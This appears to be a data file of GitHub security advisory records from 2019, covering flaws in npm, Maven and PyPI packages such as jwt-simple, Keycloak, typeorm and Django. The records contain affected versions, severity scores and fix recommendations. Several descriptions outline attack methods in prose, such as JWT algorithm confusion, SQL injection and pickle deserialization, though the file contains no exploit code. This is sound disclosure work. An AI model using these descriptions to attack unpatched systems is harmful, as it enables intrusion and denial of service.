{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-03T17:08:06Z', 'nvd_published_at': None}
1.4.0
GHSA-8v5f-hp78-jgxq
2020-08-31T18:37:26Z
2019-06-06T15:30:33Z
null
[]
Signature Verification Bypass in jwt-simple
Versions of `jwt-simple` prior to 0.5.3 are vulnerable to Signature Verification Bypass. If no algorithm is specified in the `decode()` function, the packages uses the algorithm in the JWT to decode tokens. This allows an attacker to create a HS256 (symmetric algorithm) JWT with the server's public key as secret, and the package will verify it as HS256 instead of RS256 (asymmetric algorithm). ## Recommendation Upgrade to version 0.5.3 or later.
[]
[{'package': {'ecosystem': 'npm', 'name': 'jwt-simple'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.5.3'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/hokaccha/node-jwt-simple/commit/ead36e1d687645da9c3be8befdaaef622ea33106'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/831'}]
{'cwe_ids': ['CWE-347'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-06T09:42:36Z', 'nvd_published_at': None}
1.4.0
GHSA-xggx-fx6w-v7ch
2021-08-04T20:41:46Z
2019-06-04T15:42:15Z
null
['CVE-2019-3802']
Improper Neutralization of Wildcards or Matching Symbols
This affects Spring Data JPA in versions up to and including 2.1.6, 2.0.14 and 1.11.20. ExampleMatcher using ExampleMatcher.StringMatcher.STARTING, ExampleMatcher.StringMatcher.ENDING or ExampleMatcher.StringMatcher.CONTAINING could return more results than anticipated when a maliciously crafted example value is supplied.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.data:spring-data-jpa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.data:spring-data-jpa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.1.8'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.0.14'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.data:spring-data-jpa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.22'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-3802'}, {'type': 'WEB', 'url': 'https://pivotal.io/security/cve-2019-3802'}]
{'cwe_ids': ['CWE-155', 'CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-04T15:38:52Z', 'nvd_published_at': '2019-06-03T14:29:00Z'}
1.4.0
GHSA-38cg-gg9j-q9j9
2021-08-17T15:33:33Z
2019-06-27T17:25:57Z
null
['CVE-2019-3875']
Improper Certificate Validation and Insufficient Verification of Data Authenticity in Keycloak
A vulnerability was found in keycloak before 6.0.2. The X.509 authenticator supports the verification of client certificates through the CRL, where the CRL list can be obtained from the URL provided in the certificate itself (CDP) or through the separately configured path. The CRL are often available over the network through unsecured protocols ('http' or 'ldap') and hence the caller should verify the signature and possibly the certification path. Keycloak currently doesn't validate signatures on CRL, which can result in a possibility of various attacks like man-in-the-middle.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.keycloak:keycloak-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.0.1'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-3875'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3875'}]
{'cwe_ids': ['CWE-295', 'CWE-345'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-27T15:43:10Z', 'nvd_published_at': '2019-06-12T14:29:00Z'}
1.4.0
GHSA-cff4-rrq6-h78w
2020-08-31T18:31:41Z
2019-06-03T17:31:26Z
null
[]
Command Injection in command-exists
Versions of `command-exists` before 1.2.4 are vulnerable to command injection. This is exploitable if user input is provided to this module. ## Recommendation Update to version 1.2.4 or later.
[]
[{'package': {'ecosystem': 'npm', 'name': 'command-exists'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.2.4'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/mathisonian/command-exists/commit/7ca91ba71604df6817a28c93d7776af9c49c431a'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/324453'}, {'type': 'WEB', 'url': 'https://github.com/mathisonian/command-exists/blob/v1.2.2/lib/command-exists.js#L49-L94'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/659'}]
{'cwe_ids': ['CWE-77'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2019-06-03T17:28:56Z', 'nvd_published_at': None}
1.4.0
GHSA-pgcr-7wm4-mcv6
2021-08-04T21:28:00Z
2019-06-04T15:42:45Z
null
[]
Sensitive Data Exposure in pem
Versions of `pem` before 1.13.2 expose sensitive data when the `readPkcs12` is used. The `readPkcs12` function reads the certificate and key data from a pkcs12 file using the encryption password. As part of this process it creates a globally readable file with a filename of 20 random 0-f characters in the temporary directory containing the password which is then read by OpenSSL. The file containing the password is never cleaned up after it is used giving access to the pkcs12 password to any other users with access to read files from the system. ## Recommendation Update to version 1.13.2 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'pem'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.13.2'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/Dexus/pem/pull/217'}, {'type': 'WEB', 'url': 'https://github.com/Dexus/pem/commit/bed1190e4a08692ac903ae6043489f1f76bc67eb'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PEM-173687'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/723'}]
{'cwe_ids': ['CWE-200'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2019-06-04T15:41:30Z', 'nvd_published_at': None}
1.4.0
GHSA-hwcx-9p4j-7hwj
2021-08-16T15:20:04Z
2019-06-13T20:22:30Z
null
['CVE-2019-5442']
XML Entity Expansion in Pippo
XML Entity Expansion (Billion Laughs Attack) on Pippo 1.12.0 results in Denial of Service.Entities are created recursively and large amounts of heap memory is taken. Eventually, the JVM process will run out of memory. Otherwise, if the OS does not bound the memory on that process, memory will continue to be exhausted and will affect other processes on the system.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'Maven', 'name': 'ro.pippo:pippo-jaxb'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.12.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-5442'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/506791'}]
{'cwe_ids': ['CWE-776'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T20:22:17Z', 'nvd_published_at': '2019-06-12T16:29:00Z'}
1.4.0
GHSA-w7q7-vjp8-7jv4
2020-08-31T18:36:13Z
2019-06-06T15:30:16Z
null
[]
SQL Injection in typeorm
Versions of `typeorm` before 0.1.15 are vulnerable to SQL Injection. Field names are not properly validated allowing attackers to inject SQL statements and execute arbitrary SQL queries. ## Recommendation Upgrade to version 0.1.15
[]
[{'package': {'ecosystem': 'npm', 'name': 'typeorm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.15'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/typeorm/typeorm/commit/d46c8b0e6c0db56bb5976a4917e9f67a43715111'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/319458'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/800'}]
{'cwe_ids': ['CWE-89'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T21:25:43Z', 'nvd_published_at': None}
1.4.0
GHSA-j9f8-8h89-j69x
2021-08-04T21:06:49Z
2019-06-11T16:16:34Z
null
[]
Remote Code Execution in node-os-utils
Versions of `node-os-utils` prior to 1.1.0 are vulnerable to Remote Code Execution. Due to insufficient input validation an attacker could run arbitrary commands on the server thus rendering the package vulnerable to Remote Code Execution. ## Recommendation Upgrade to version 1.1.0 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': 'node-os-utils'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/SunilWang/node-os-utils/issues/2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODEOSUTILS-173696'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/784'}]
{'cwe_ids': ['CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-11T16:08:05Z', 'nvd_published_at': None}
1.4.0
GHSA-3h4r-pjv6-cph9
2023-08-28T13:23:44Z
2019-06-20T16:05:57Z
null
['CVE-2019-8323']
RubyGems Escape sequence injection vulnerability in api response handling
An issue was discovered in RubyGems 2.6 and later through 3.0.2. Gem::GemcutterUtilities#with_response may output the API response to stdout as it is. Therefore, if the API side modifies the response, escape sequence injection may occur.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'RubyGems', 'name': 'rubygems-update'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.7.9'}]}]}, {'package': {'ecosystem': 'RubyGems', 'name': 'rubygems-update'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-8323'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/315081'}, {'type': 'WEB', 'url': 'https://blog.rubygems.org/2019/03/05/security-advisories-2019-03.html'}, {'type': 'WEB', 'url': 'https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rubygems-update/CVE-2019-8323.yml'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/08/msg00027.html'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-07/msg00036.html'}]
{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-20T15:59:33Z', 'nvd_published_at': None}
1.4.0
GHSA-p426-qw2p-v95v
2021-08-17T14:51:31Z
2019-06-26T01:09:35Z
null
['CVE-2017-15694']
Argument Injection in Apache Geode server
When an Apache Geode server versions 1.0.0 to 1.8.0 is operating in secure mode, a user with write permissions for specific data regions can modify internal cluster metadata. A malicious user could modify this data in a way that affects the operation of the cluster.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.geode:geode-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-15694'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/311505e7b7a045aaa246f0a1935703acacf41b954621b1363c40bf6f@%3Cuser.geode.apache.org%3E'}]
{'cwe_ids': ['CWE-88'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-26T00:48:24Z', 'nvd_published_at': '2019-06-21T16:15:00Z'}
1.4.0
GHSA-c35v-qwqg-87jc
2022-08-03T16:27:53Z
2019-06-06T15:32:32Z
null
[]
express-basic-auth Timing Attack due to native string comparison instead of constant time string comparison
Versions of `express-basic-auth` prior to 1.1.7 are vulnerable to Timing Attacks. The package uses native string comparison instead of a constant time string comparison, which may lead to Timing Attacks. Timing Attacks can be used to increase the efficiency of brute-force attacks by removing the exponential increase in entropy gained from longer secrets. ## Recommendation Upgrade to version 1.1.7 or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'express-basic-auth'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.7'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/webpack-contrib/webpack-bundle-analyzer/issues/263'}, {'type': 'WEB', 'url': 'https://github.com/LionC/express-basic-auth/pull/20'}, {'type': 'WEB', 'url': 'https://github.com/LionC/express-basic-auth/pull/21'}, {'type': 'WEB', 'url': 'https://github.com/LionC/express-basic-auth/commit/00bb29fdd638f5cda8025d4398be97d528ce3f6f'}, {'type': 'PACKAGE', 'url': 'https://github.com/LionC/express-basic-auth'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-EXPRESSBASICAUTH-174345'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/827'}]
{'cwe_ids': ['CWE-208'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2019-06-06T09:51:04Z', 'nvd_published_at': None}
1.4.0
GHSA-2pr6-76vf-7546
2021-08-04T21:32:56Z
2019-06-05T14:35:29Z
null
[]
Denial of Service in js-yaml
Versions of `js-yaml` prior to 3.13.0 are vulnerable to Denial of Service. By parsing a carefully-crafted YAML file, the node process stalls and may exhaust system resources leading to a Denial of Service. ## Recommendation Upgrade to version 3.13.0.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'js-yaml'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.13.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/nodeca/js-yaml/issues/475'}, {'type': 'WEB', 'url': 'https://github.com/nodeca/js-yaml/commit/a567ef3c6e61eb319f0bfc2671d91061afb01235'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-JSYAML-173999'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/788'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/788/versions'}]
{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T13:52:07Z', 'nvd_published_at': None}
1.4.0
GHSA-v33x-prhc-gph5
2021-06-09T20:12:57Z
2019-06-27T17:24:58Z
null
['CVE-2019-11272']
Insufficiently Protected Credentials and Improper Authentication in Spring Security
Spring Security, versions 4.2.x up to 4.2.12, and older unsupported versions support plain text passwords using PlaintextPasswordEncoder. If an application using an affected version of Spring Security is leveraging PlaintextPasswordEncoder and a user has a null encoded password, a malicious user (or attacker) can authenticate using a password of ?null?.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.13'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.2.12'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.springframework.security:spring-security-cas'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.2.13.RELEASE'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.2.12.RELEASE'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-11272'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2019/07/msg00008.html'}, {'type': 'WEB', 'url': 'https://pivotal.io/security/cve-2019-11272'}]
{'cwe_ids': ['CWE-287', 'CWE-522'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-27T17:23:36Z', 'nvd_published_at': '2019-06-26T14:15:00Z'}
1.4.0
GHSA-22mf-97vh-x8rw
2021-12-03T14:35:56Z
2019-06-13T16:12:57Z
2019-07-03T16:48:55Z
['CVE-2019-12760']
TODO
** DISPUTED ** A deserialization vulnerability exists in the way parso through 0.4.0 handles grammar parsing from the cache. Cache loading relies on pickle and, provided that an evil pickle can be written to a cache grammar file and that its parsing can be triggered, this flaw leads to Arbitrary Code Execution. NOTE: This is disputed because "the cache directory is not under control of the attacker in any common configuration."
[]
[{'package': {'ecosystem': 'PyPI', 'name': 'parso'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.4.0'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-12760'}, {'type': 'WEB', 'url': 'https://gist.github.com/dhondta/f71ae7e5c4234f8edfd2f12503a5dcc7'}]
{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T15:48:35Z', 'nvd_published_at': '2019-06-06T19:29:00Z'}
1.4.0
GHSA-46hv-7769-j7rx
2023-09-07T21:43:42Z
2019-06-13T16:12:22Z
null
['CVE-2019-5437']
Unauthorized File Access in harp
Affected versions of `harp` are vulnerable to Unauthorized File Access. The package states that it ignores files and directories with names that start with an underscore, such as `_secret-folder`. If the underscore character is URL encoded the server delivers the file. ## Recommendation Upgrade to version `0.40.2` or later.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
[{'package': {'ecosystem': 'npm', 'name': 'harp'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.40.2'}]}]}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-5437'}, {'type': 'WEB', 'url': 'https://github.com/sintaxi/harp/commit/1ec790baeeb2bfdb4584f1998af3d10a8fa31210'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/453820'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/807'}]
{'cwe_ids': ['CWE-548'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T16:10:40Z', 'nvd_published_at': None}
1.4.0
GHSA-h6ch-v84p-w6p9
2021-02-24T19:27:02Z
2019-06-13T18:58:54Z
null
[]
Regular Expression Denial of Service (ReDoS)
A vulnerability was found in diff before v3.5.0, the affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) attacks.
[]
[{'package': {'ecosystem': 'npm', 'name': 'diff'}, 'ecosystem_specific': {'affected_functions': ['diff.parsePatch']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/kpdecker/jsdiff/commit/2aec4298639bf30fb88a00b356bf404d3551b8c0'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1552148'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:diff:20180305'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1631'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/WS-2018-0590'}]
{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2019-06-13T18:54:38Z', 'nvd_published_at': None}
1.4.0
GHSA-g95f-p29q-9xw4
2021-08-04T21:35:07Z
2019-06-06T15:30:30Z
null
[]
Regular Expression Denial of Service in braces
Versions of `braces` prior to 2.3.1 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions. This can cause the application to be unresponsive leading to Denial of Service. ## Recommendation Upgrade to version 2.3.1 or higher.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': 'braces'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/micromatch/braces/commit/abdafb0cae1e0c00f184abbadc692f4eaa98f451'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/npm:braces:20180219'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/786'}]
{'cwe_ids': ['CWE-185', 'CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2019-06-06T09:40:51Z', 'nvd_published_at': None}
1.4.0
GHSA-86p3-4gfq-38f2
2021-08-04T21:31:03Z
2019-06-05T14:10:34Z
null
[]
Denial of Service in url-relative
All versions of `url-relative` are vulnerable to Denial of Service. If the values `to` and `from` are equal, the function hangs and never returns. This may cause a Denial of Service. ## Recommendation No fix is currently available. Consider using an alternative module until a fix is made available.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]
[{'package': {'ecosystem': 'npm', 'name': 'url-relative'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/junosuarez/url-relative/issues/3'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-URLRELATIVE-173691'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/783'}]
{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T13:46:47Z', 'nvd_published_at': None}
1.4.0
GHSA-8f93-rv4p-x4jw
2020-08-31T18:31:48Z
2019-06-12T16:36:52Z
null
[]
SQL Injection in sql
All versions of `sql` are vulnerable to sql injection as it does not properly escape parameters when building SQL queries. ## Recommendation No fix is currently available for this vulnerability. It is our recommendation to not install or use this module until a fix is available.
[]
[{'package': {'ecosystem': 'npm', 'name': 'sql'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.78.0'}]}]}]
[{'type': 'WEB', 'url': 'https://hackerone.com/reports/319465'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/662'}]
{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-12T16:36:34Z', 'nvd_published_at': None}
1.4.0
GHSA-hp5r-mhgp-56c9
2021-08-04T20:00:07Z
2019-06-06T15:29:29Z
null
['CVE-2019-10078']
Cross-site Scriptin in JSPWiki
A carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki 2.9.0 to 2.11.0.M3, which could lead to session hijacking. Initial reporting indicated ReferredPagesPlugin, but further analysis showed that multiple plugins were vulnerable.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.jspwiki:jspwiki-war'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.11.0.M4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.11.0.M3'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.jspwiki:jspwiki-main'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.11.0.M4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.11.0.M3'}}]
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10078'}, {'type': 'WEB', 'url': 'https://jspwiki-wiki.apache.org/Wiki.jsp?page=CVE-2019-10078'}]
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-05-29T19:05:49Z', 'nvd_published_at': '2019-05-20T21:29:00Z'}
1.4.0
GHSA-rv49-54qp-fw42
2020-08-31T18:36:18Z
2019-06-06T15:30:20Z
null
[]
Path Traversal in servey
Versions of `servey` prior to 3.x are vulnerable to Path Traversal. Due to insufficient input sanitization, attackers can access server files by using relative paths. ## Recommendation Upgrade to the latest version
[]
[{'package': {'ecosystem': 'npm', 'name': 'servey'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.0'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/typeorm/typeorm/commit/d46c8b0e6c0db56bb5976a4917e9f67a43715111'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/355501'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/802'}]
{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-06T08:47:21Z', 'nvd_published_at': None}
1.4.0
GHSA-f7r3-p866-q9qr
2022-08-03T16:34:42Z
2019-06-03T17:27:49Z
null
[]
ircdkit vulnerable to Denial of Service due to unhandled connection end event
Versions of `ircdkit` 1.0.3 and prior are vulnerable to a remote denial of service. ## Recommendation Upgrade to version 1.0.4.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
[{'package': {'ecosystem': 'npm', 'name': 'ircdkit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.3'}}]
[{'type': 'WEB', 'url': 'https://github.com/Twipped/ircdkit/issues/1'}, {'type': 'WEB', 'url': 'https://github.com/Twipped/ircdkit/pull/2/commits/595ed02cde517fad57854d2ac2855a09a626e665'}, {'type': 'WEB', 'url': 'https://github.com/Twipped/ircdkit/commit/f0cc6dc913ec17b499fa33a676bb72c624456f2c'}, {'type': 'PACKAGE', 'url': 'https://github.com/Twipped/ircdkit'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-IRCDKIT-173688'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/735'}]
{'cwe_ids': ['CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2019-06-03T17:27:33Z', 'nvd_published_at': None}
1.4.0
GHSA-xm7f-x4wx-wmgv
2020-08-31T18:31:36Z
2019-06-04T15:47:43Z
null
[]
Out-of-bounds Read in byte
Versions of `byte` before 1.4.1 allocate uninitialized buffers and read data from them past the initialized length ## Recommendation Update to version 1.4.1 or later.
[]
[{'package': {'ecosystem': 'npm', 'name': 'byte'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.1'}]}]}]
[{'type': 'WEB', 'url': 'https://github.com/node-modules/byte/pull/3'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/330351'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/657'}]
{'cwe_ids': ['CWE-125'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-04T15:47:01Z', 'nvd_published_at': None}
1.4.0
GHSA-7rp2-fm2h-wchj
2023-09-05T13:11:53Z
2019-06-10T18:43:25Z
null
['CVE-2019-12308']
Django Cross-site Scripting in AdminURLFieldWidget
An issue was discovered in Django 1.11 before 1.11.21, 2.1 before 2.1.9, and 2.2 before 2.2.2. The clickable Current URL value displayed by the AdminURLFieldWidget displays the provided value without validating it as a safe URL. Thus, an unvalidated value stored in the database, or a value provided as a URL query parameter payload, could result in an clickable JavaScript link.
[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]
[{'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.11.0'}, {'fixed': '1.11.21'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.9'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'django'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.2'}]}]}]
